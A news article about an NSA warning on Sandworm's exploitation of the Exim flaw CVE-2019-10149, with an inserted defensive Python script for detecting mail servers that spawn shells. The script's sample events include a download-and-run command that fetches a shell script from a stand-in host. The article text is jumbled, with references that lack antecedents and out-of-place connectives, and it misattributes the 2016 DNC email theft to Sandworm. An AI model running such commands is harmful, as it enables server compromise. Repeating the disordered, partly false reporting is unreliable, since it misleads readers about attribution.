NSA: Russian Hackers Targeting Vulnerable Email Servers

Yolanda Curtis
May 30, 2020

The group was also called out in a February 20 statement by the Department of State for a cyberattack that disrupted government websites and broadcast television in the Republic of Georgia.

An NSA official reached by The Associated Press would only say that the agency is publicizing the vulnerability because, despite an October warning by British officials, it "has continued to be exploited and needs to be patched".

Exim is mail transfer agent (MTA) software for Unix-based systems that comes pre-installed on some Linux distributions.

When Sandworm exploits the vulnerability, victim machines download and execute a shell script from a Sandworm-controlled domain, according to the NSA.
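The behaviour described above (a mail server process fetching and running a shell script) is something a defender can look for in process telemetry. The following is an added example, not code from the article or from the NSA advisory: it scans a constructed stream of process-creation events and flags any case where an MTA process spawns a shell or a download tool, or a child whose command line carries a URL. The event format, the process names, the timestamps and the hostname are all assumed for illustration and do not correspond to any real telemetry source or indicator.

```python
import json
import os
import re
import shlex

# Constructed sample events (not real telemetry). Each line is a JSON object
# describing one process creation: timestamp, parent process name, child command line.
SAMPLE_EVENTS = """
{"ts": "2020-05-30T10:01:12Z", "parent": "exim", "child": "/usr/sbin/exim -bd -q30m"}
{"ts": "2020-05-30T10:01:13Z", "parent": "exim", "child": "/bin/sh -c wget http://example.invalid/s.sh -O /tmp/s.sh"}
{"ts": "2020-05-30T10:01:14Z", "parent": "sh", "child": "/bin/sh /tmp/s.sh"}
{"ts": "2020-05-30T10:02:00Z", "parent": "cron", "child": "/usr/bin/run-parts /etc/cron.hourly"}
{"ts": "2020-05-30T10:03:05Z", "parent": "exim", "child": "/usr/sbin/exim -Mc 1jeABC-0001xy-Zz"}
"""

# Process names under which the MTA is assumed to run (Debian packages it as exim4).
MTA_PROCESSES = {"exim", "exim4"}

# Binaries an MTA has little reason to launch directly during normal delivery.
SUSPICIOUS_BINARIES = {"sh", "bash", "dash", "wget", "curl", "python", "python3", "perl"}

URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)


def parse_events(text):
    """Yield one event dict per non-empty JSON line."""
    for line in text.splitlines():
        line = line.strip()
        if line:
            yield json.loads(line)


def classify_child(event):
    """Return a reason string when an MTA process spawns a shell or downloader,
    or None when the event looks like ordinary delivery work."""
    if event.get("parent") not in MTA_PROCESSES:
        return None
    command = event.get("child", "")
    try:
        argv = shlex.split(command)
    except ValueError:
        return "unparseable child command line"
    if not argv:
        return None
    binary = os.path.basename(argv[0])
    if binary in SUSPICIOUS_BINARIES:
        return f"MTA spawned {binary}"
    if URL_RE.search(command):
        return "MTA child command line contains a URL"
    return None


def find_suspicious(text):
    """Run classify_child over every event and collect the hits."""
    hits = []
    for event in parse_events(text):
        reason = classify_child(event)
        if reason is not None:
            hits.append({"ts": event.get("ts"), "child": event.get("child"), "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(f"{hit['ts']}  {hit['reason']}: {hit['child']}")
```

Only direct children of the MTA are examined here; the grandchild that runs the downloaded script (parent `sh`) is not flagged, so a production rule would track process ancestry rather than a single parent name. Sites that deliberately run pipe transports or content filters from their MTA should extend the allowlist rather than lower the rule's sensitivity.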

When the patch for the vulnerability was issued a year ago, there was "no evidence" anyone was actively exploiting it, according to Exim. Within weeks of the patch being issued, the Russian military hackers began their onslaught.

The vulnerability being exploited, CVE-2019-10149, allows a remote attacker to execute commands and code of their choosing, NSA warned.

Exim is so widely used - though far less known than such commercial alternatives as Microsoft's proprietary Exchange - that some companies and government agencies that run it may still not have patched the vulnerability, said Jake Williams, president of Rendition Infosec and a former U.S. government hacker.

Williams also warns that attackers who exploit these types of server vulnerabilities could potentially gain full control of the server and launch further attacks from it. That group is more commonly known as Sandworm, the hacking group believed to be responsible for the Ukraine grid disruptions.

The NSA also suggests limiting user access privileges when installing public-facing software such as mail transfer agents, as well as using network segmentation to separate roles and requirements.

However, the NSA did state that the campaign was tied to a specific unit within Russia's Main Intelligence Directorate: the Main Center for Special Technologies.

The Sandworm group is the same one that interfered in the 2016 presidential election, stealing and exposing Democratic National Committee e-mails and breaking into voter registration databases.